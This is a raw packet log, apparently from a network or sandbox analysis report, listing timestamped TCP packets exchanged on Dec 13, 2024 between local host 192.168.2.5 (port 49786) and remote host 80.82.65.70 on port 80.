                                          Dec 13, 2024 06:12:59.806870937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.806925058 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.806974888 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.807699919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.807751894 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.807815075 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.807864904 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.808568001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.808619976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.808679104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.808727980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.809432983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.809480906 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.809521914 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.809561968 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.810906887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.810923100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.810967922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.810981989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.811189890 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.811242104 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.811275959 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.811331034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.812062025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.812120914 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.812164068 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.812920094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.812964916 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.812968969 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.813848972 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.814296007 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.814311028 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.814358950 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.814656973 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.814719915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.814768076 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.815524101 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.815573931 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.815587044 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.815633059 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.816405058 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.816457033 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.842957020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.842983961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.843112946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.843153000 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.843153000 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.843190908 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.843214035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.843267918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.843956947 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.844021082 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.844064951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.844120979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.844816923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.844880104 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.844949007 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.845005989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.845695019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.845757961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.845830917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.845894098 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.846559048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.846616030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.846684933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.846741915 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.847440004 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.847501040 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.847559929 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.847615957 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.848378897 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.848440886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.848591089 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.848648071 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.849204063 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.849265099 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.849329948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.849385023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.850039005 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.850099087 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.850153923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.850210905 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.885313988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.885421991 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.885612011 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.885715008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.885788918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.885875940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.885936022 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.886610031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.886645079 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.886673927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.886709929 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.887475014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.887537956 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.928910017 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.928965092 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.929147959 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.929173946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.929212093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.929271936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.930001974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.930075884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.930123091 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.930917025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.930974007 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.930988073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.931742907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.931791067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.931912899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.931974888 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.932631969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.932777882 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.932837009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.933480978 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.933540106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.933620930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.934439898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.934497118 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.934551001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.935579062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.935632944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.935719013 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.936196089 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.936250925 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.936301947 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.936353922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.937083960 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.937161922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.937212944 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.937269926 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.937985897 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.938133955 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.938191891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.938699961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.938774109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.938843966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.939152956 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.939621925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.939733982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.939765930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.939795017 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.940474987 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.940591097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.940620899 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.940660954 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.941766024 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.941837072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.941905975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.941981077 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.942193031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.942306042 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.942359924 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.942425013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.943080902 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.943144083 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.943373919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.943437099 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.943958998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.944024086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.944147110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.944207907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.944822073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.944883108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.944952011 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.945009947 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.946225882 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.946295023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.946424007 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.946485043 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.946554899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.946624994 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.946674109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.946732998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.947403908 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.947465897 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.947616100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.947736025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.948322058 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.948381901 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.948451996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.948503971 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.949273109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.949327946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.949336052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.949471951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.950170994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.950206041 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.950225115 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.950268984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.950885057 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.950939894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.950944901 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.951070070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.997944117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.998009920 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.998020887 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.998065948 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.998344898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.998404980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.998565912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.998615026 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.999218941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.999269009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.999361992 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.999412060 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.000137091 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.000190973 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.000260115 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.000307083 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.001089096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.001142979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.001193047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.001238108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.001828909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.001878023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.002064943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.002720118 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.002774000 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.002820015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.002903938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.003655910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.003705025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.003712893 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.003756046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.004470110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.004528046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.004645109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.004693031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.005331039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.005367994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.005382061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.005417109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.006305933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.006340027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.006356955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.006385088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.007221937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.007258892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.007272005 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.007303953 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.007936001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.008008003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.008156061 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.008205891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.008769035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.008837938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.034531116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.034585953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.034674883 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.034755945 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.034837961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.034902096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.035610914 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.035681963 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.035732985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.035897970 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.036504030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.036564112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.036643982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.036705971 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.037393093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.037466049 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.037514925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.037578106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.038274050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.038337946 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.038393021 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.038451910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.039170027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.039284945 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.039370060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.039433002 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.040698051 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.040966034 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.041029930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.041857958 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.042057037 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.042119026 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.042798996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.042857885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.042864084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.042913914 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.043277025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.043349028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.077337027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.077406883 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.077440023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.077496052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.077788115 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.077841043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.077847004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.077887058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.078608036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.078675985 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.078742027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.078933954 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.079473972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.079535007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.120769024 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.120800972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.120841980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.120841980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.120944023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.121066093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.121125937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.121830940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.121882915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.121946096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.122642994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.122704029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.122757912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.122812986 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.123537064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.123594046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.123615980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.123732090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.124393940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.124459028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.124506950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.124556065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.125459909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.125521898 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.125545979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.125597000 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.126177073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.126296043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.126352072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.127113104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.127182961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.127228975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.127279997 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.127890110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.128142118 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.128201008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.128782988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.128880024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.128884077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.128950119 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.129669905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.129730940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.129760027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.129869938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.130510092 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.130584955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.130628109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.130680084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.131371975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.131503105 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.131530046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.131586075 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.132253885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.132317066 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.132319927 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.132375956 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.133102894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.133162022 CET4978680192.168.2.580.82.65.70
